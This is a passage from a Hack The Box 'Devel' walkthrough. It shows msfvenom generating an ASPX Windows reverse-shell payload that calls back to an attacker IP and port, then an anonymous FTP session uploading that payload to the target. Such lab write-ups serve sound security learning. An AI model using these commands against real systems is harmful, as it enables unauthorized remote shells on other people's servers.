Exploitation
Initial Foothold
Knowing that we can put files lets put our reverse shell with MSVenom
msfvenom --list formats
#list all formats and we can see we can generate apsx paylaodsmsfvenom --list payloads | grep windowsGenerating Payload
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.34 LPORT=4444 -o reverse-shell.aspxUploading Payload
root@kali:/home/kali/HTB/Devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put reverse-shell.aspx
local: reverse-shell.aspx remote: reverse-shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2749 bytes sent in 0.00 secs (24.0518 MB/s)
ftp> Establishing Connection

Last updated
Was this helpful?